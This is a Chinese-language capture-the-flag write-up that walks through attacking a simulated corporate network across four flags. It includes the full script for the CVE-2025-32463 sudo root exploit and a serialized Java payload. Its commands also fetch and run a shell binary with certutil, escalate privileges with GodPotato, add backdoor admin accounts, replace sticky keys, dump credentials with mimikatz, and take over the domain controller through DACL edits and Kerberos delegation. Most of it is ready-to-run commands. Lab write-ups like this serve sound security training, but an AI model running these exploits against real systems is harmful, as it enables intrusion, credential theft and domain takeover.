BkAAAAEAAEAHQACAB8AAAACACAARQAAAAoAAQAtACoARAAJdXEAfgAYAAAA8sr+ur4AAAAxABMBAANGb28HAAEBABBqYXZhL2xhbmcvT2JqZWN0BwADAQAKU291cmNlRmlsZQEACEZvby5qYXZhAQAUamF2YS9pby9TZXJpYWxpemFibGUHAAcBABBzZXJpYWxWZXJzaW9uVUlEAQABSgVx5mnuPG1HGAEADUNvbnN0YW50VmFsdWUBAAY8aW5pdD4BAAMoKVYMAA4ADwoABAAQAQAEQ29kZQAhAAIABAABAAgAAQAaAAkACgABAA0AAAACAAsAAQABAA4ADwABABIAAAARAAEAAQAAAAUqtwARsQAAAAAAAQAFAAAAAgAGcHQAAsGQcHcBAHh3BAAAAAF4
Priority: u=0, i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:147.0) Gecko/20100101 Firefox/147.0
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1

不要忘了这个东西

当前权限比较低，找一下suid提权的命令

find / -perm -u=s -type f 2>/dev/null

里面有个cmp，可以用来任意文件读取

cmp /flag.txt /dev/zero -b -l

flag{9b4b7a38-3d45-47e1-b92d-2eea0bc684c9}

也可以用sudo最新的CVE-2025-32463提权到root

sudo -V查看sudo版本，当前版本为1.9.15，在1.9.14至1.9.17都是能用的

新建一个如下的sh脚本，运行即可提权，哥斯拉虽然不能交互式shell，但是可以文件管理直接上传

#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
#                  @ Stratascale Cyber Research Unit (CRU)
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1

if [ $# -eq 0 ]; then
    # If no command is provided, default to an interactive root shell.
    CMD="/bin/bash"
else
    # Otherwise, use the provided arguments as the command to execute.
    CMD="$@"
fi

# Escape the command to safely include it in a C string literal.
# This handles backslashes and double quotes.
CMD_C_ESCAPED=$(printf '%s' "$CMD" | sed -e 's/\\/\\\\/g' -e 's/"/\\"/g')

cat > woot1337.c<<EOF
#include <stdlib.h>
#include <unistd.h>

__attribute__((constructor)) void woot(void) {
  setreuid(0,0);
  setregid(0,0);
  chdir("/");
  execl("/bin/sh", "sh", "-c", "${CMD_C_ESCAPED}", NULL);
}
EOF

mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c

echo "woot!"
sudo -R woot woot
rm -rf ${STAGE?}

flag2

/AoseluMail目录下有外网web的源码

spring配置文件可以找到数据库账密

spring.datasource.driver-class-name=com.mysql.cj.jdbc.Driver
spring.datasource.url=jdbc:mysql://172.16.52.45:3306/maildb?characterEncoding=utf-8&useUnicode=true&serverTimezone=UTC
spring.datasource.username=root
spring.datasource.password=T%b8ds*l3v+B

gost代理出来，尝试连接172.16.52.45，结果连不上，还是扫一遍fscan吧

/tmp >./FScan_2.0.1_linux_x64 -h 172.16.53.30/24

┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.1

[1.8s]     已选择服务扫描模式
[1.8s]     开始信息扫描
[1.8s]     CIDR范围: 172.16.53.0-172.16.53.255
[1.8s]     generate_ip_range_full
[1.8s]     解析CIDR 172.16.53.30/24 -> IP范围 172.16.53.0-172.16.53.255
[1.8s]     最终有效主机数量: 256
[1.8s]     开始主机扫描
[1.8s]     使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[1.8s]     正在尝试无监听ICMP探测...
[1.8s]     ICMP连接失败: dial ip4:icmp 127.0.0.1: socket: operation not permitted
[1.8s]     当前用户权限不足,无法发送ICMP包
[1.8s]     切换为PING方式探测...
[4.9s] [*] 目标 172.16.53.30    存活 (ICMP)
[7.9s]     存活主机数量: 1
[7.9s]     有效端口数量: 233
[7.9s] [*] 端口开放 172.16.53.30:80
[7.9s] [*] 端口开放 172.16.53.30:22
[7.9s] [*] 端口开放 172.16.53.30:8080
[7.9s]     扫描完成, 发现 3 个开放端口
[7.9s]     存活端口数量: 3
[7.9s]     开始漏洞扫描
[7.9s] [*] 网站标题 http://172.16.53.30       状态码:200 长度:33611  标题:Aoselu Automotive - Redefining Mobility
[8.1s]     POC加载完成: 总共387个，成功387个，失败0个
[8.7s] [*] 网站标题 http://172.16.53.30:8080  状态码:200 长度:15978  标题:Aoselu Automotive - Email Login
[44.7s]     扫描已完成: 5/5

53网段只能扫到本机

正向上vshell，注意监听不要开到80或者8080了，本来有服务的是开不起来的

扫一下B段，好像会直接卡死，等会来看，先打后面

./FScan_2.0.1_linux_x64 -h 172.16.53.30/16

官方给出的拓扑

Extranet 172.16.53.30
ASLITPC03 172.16.36.21
ASLSRVFS02 172.16.34.23
ASLSRVAD05 172.16.34.5

./sudo-chwoot.sh /tmp/FScan_2.0.1_linux_x64 -h 172.16.34.30/24,172.16.36.21/24

机器有点问题，第一遍fscan能扫到，第二遍就卡死了，这里就不贴fscan了

fscan按理说是能扫到172.16.36.21开了3306端口,懒得上传nmap之类的了

这里内网穿透出来连不上网很正常，因为目标http不出网，最好gost连上后用各种工具内置的代理，不要用proxifier(或者pac模式)

gost -L socks5://:5555?bind=true

gost -L rtcp://:2222/39.99.152.42:22 -F socks5://39.99.152.42:5555

由于MDUT内置代理不能走socks5通道，这里锁定到目标进程

然后配一条rules即可

UDF提权一下就是域service权限

这里还需要提权，把vshell生成的马放到web1上，web1上有python3，如果没权限用前面的提权再弹一个到vshell上

./sudo-chwoot.sh /tmp/tcp_linux_amd64

python3 -m http.server 81

certutil.exe -urlcache -split -f http://172.16.53.30:81/tcp_windows_amd64.exe C:/Users/Public/shell.exe

C:/Users/Public/shell.exe

查看特权

有SeImpersonatePrivilege，和MagicRelay一样，打土豆提权

上传甜土豆，但是提权失败了

试一下土豆家族其他提权 https://github.com/BeichenDream/GodPotato/releases/tag/V1.20

用godpotato，目标系统windows Server2025，有.net 4

GodPotato-NET4.exe -cmd "cmd /c whoami"

GodPotato-NET4.exe -cmd "cmd /c type C:\Users\Administrator\Desktop\flag.txt"

flag{723f7cc7-691c-4c20-8f12-8c50bba7b5c0}

flag3

上传SharpHound收集

GodPotato-NET4.exe -cmd "cmd /c SharpHound -c all"

当前的机器HasSession SVC_MONADM01，然后这个用户对05机器有WriteDacl，那么利用就很清楚了，先把SVC_MONADM01的hash dump下来，然后打RBCD

这里的session并没有在内存里，而是在自动登录配置里，用msf的post/windows/gather/credentials/windows_autologin可以发现，如果没打msf，也可以在rdp上的HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon项中找到自动登陆的账密

把system32下的rdp程序 mstsc.exe加入代理

GodPotato-NET4.exe -cmd "cmd /c net user godown qwerQ!1234 /add"
GodPotato-NET4.exe -cmd "cmd /c net localgroup administrators godown /add"

找到自动登陆的账密 EthanMorris/DROCV4?LtyCp

而且这是个域账户，在aoseluauto.com下

nxc查看共享文件

nxc smb 172.16.34.23 -u EthanMorris -p DROCV4?LtyCp --shares

域用户EthanMorris只对ASLSRVFS02$主机上的共享文件夹FileService有读写权限

连接上去，在IT Resources/Ops Scripts下有很多ps1脚本

python smbclient.py aoseluauto.com/EthanMorris:DROCV4?LtyCp@172.16.34.23

下载RemoteBackupWithCreds.ps1

get RemoteBackupWithCreds.ps1

里面有后门账密

# --- credentials ---
$username = "aoseluauto\svc_bakadm01"
$password = "k3!8Fa&Sq8Z6"

登陆上去

proxychains4 -q evil-winrm -i 172.16.34.23 -u svc_bakadm01 -p 'k3!8Fa&Sq8Z6'

看到开启了seBackup和seRestore，那卷影拷贝和exe劫持都能打，详情见Privilege靶场的打法

修改粘滞键，然后rdp上去锁屏按5次shift

ren c:\windows\system32\sethc.exe c:\windows\system32\sethc.bak
ren c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
proxychains4 xfreerdp /v:172.16.34.23 /u:svc_bakadm01 /p:'k3!8Fa&Sq8Z6'

type c:\Users\Administrator\Desktop\flag.txt.txt

flag{55fb86d4-68ea-4697-81ee-3fb7cdcd1ee9}

flag4

上传mimikatz dump hash

注意mimikatz会被windows杀掉，而放行需要administrator权限

用system32新增一个admin用户，rdp上去传mimikatz即可

net user godown qwerQ!1234 /add

net localgroup administrators godown /add

proxychains4 xfreerdp /v:172.16.34.23 /u:godown /p:'qwerQ!1234'

mimikatz.exe "privilege::debug sekurlsa::logonpasswords full" exit

前面提到svc_monadm01才对DC有writeDACL，所以这里找到svc_monadm01的NTLM hash

ab232c3cf9f4b7cf27602082b04f306b

用writeDACL修改目标的DACL，然后打rbcd，如果我记得没错，打dcsync也是可以的，不过域内没看到有开了dcsync的，可能不支持，打RBCD比较稳定

proxychains4 -q python dacledit.py -action 'write' -rights 'FullControl' -principal 'svc_monadm01' -target-dn 'CN=ASLSRVAD05,OU=Domain Controllers,DC=aoseluauto,DC=com' 'aoseluauto.com/svc_monadm01' -hashes :ab232c3cf9f4b7cf27602082b04f306b -dc-ip 172.16.34.5

下面是打RBCD

添加机器用户

proxychains4 -q addcomputer.py -computer-name 'godown$' -computer-pass '123@#ABC' 'aoseluauto.com/svc_monadm01' -hashes :ab232c3cf9f4b7cf27602082b04f306b -dc-ip 172.16.34.5

修改msDs属性，获取票据

proxychains4 -q rbcd.py -delegate-from 'godown$' -delegate-to 'ASLSRVAD05$' -action 'write' 'aoseluauto.com/svc_monadm01' -hashes :ab232c3cf9f4b7cf27602082b04f306b -dc-ip 172.16.34.5
proxychains4 impacket-getST -spn cifs/ASLSRVAD05.aoseluauto.com aoseluauto/godown\$:'123@#ABC' -impersonate SVC_ADM01 -dc-ip 172.16.34.5

报错KRB_AP_ERR_SKEW

需要向域控同步时间 ，用ntpdate无法同步时间，可能时钟管理不能访问

他的域内其他主机肯定和它在同一时钟内，把Rubeus传到刚才的rdp窗口，然后用Rubeus打RBCD

#获取新添加用户的rc4
Rubeus.exe hash /password:123@#ABC /user:godown$ /domain:aoseluauto.com
#请求票据
Rubeus.exe s4u /user:godown$ /rc4:3A37C6AC3AFBEEF7A8EB36A4481BDED4 /domain:aoseluauto.com /msdsspn:cifs/ASLSRVAD05 /impersonateuser:SVC_ADM01 /nowrap /ptt

看别人的wp发现用户即使不一样最后的rc4都是一样的，好神奇

用C$即可共享

flag{4354d837-1a43-4f11-8021-faaf860e68ae}

上面命令Rubeus默认把TGT注入到了内存，如果后续要横向，用wmiexec和其他横向的 -no-pass即可横向过去

wmiexec.py DC.xiaorang.lab -k -no-pass -dc-ip 172.22.2.3

如果想在本地横向过去，可以用Rubeus的/ptt参数注入票据，在Brute4Road也见识过了

C:/Users/Public/Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:tickbase64String

忘说了，这个靶场flag是静态的